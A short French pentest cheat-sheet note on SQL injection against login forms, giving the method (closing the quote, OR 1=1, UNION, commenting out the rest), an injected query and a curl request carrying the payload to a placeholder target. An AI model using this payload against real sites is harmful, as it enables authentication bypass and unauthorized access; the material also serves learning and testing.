Injecter des commandes SQL dans les paramêtres pour réécrire la requête.

SELECT * FROM user WHERE login='[USER]' and password='[PASSWORD]';

Méthode : fermer la ', élargir la requête avec OR 1=1, ajouter des valeurs avec UNION, commenter la fin de la requête avec # ou -- -

SELECT * FROM user WHERE login='admin' OR 1=1 -- - and password='bob';

curl http://target/login.pgp?login=admin' OR 1=1 -- -&password=bob

Des que vous pouvez lancer une commande sur votre cible, vous avez besoin de transférer des fichiers textes ou binaires.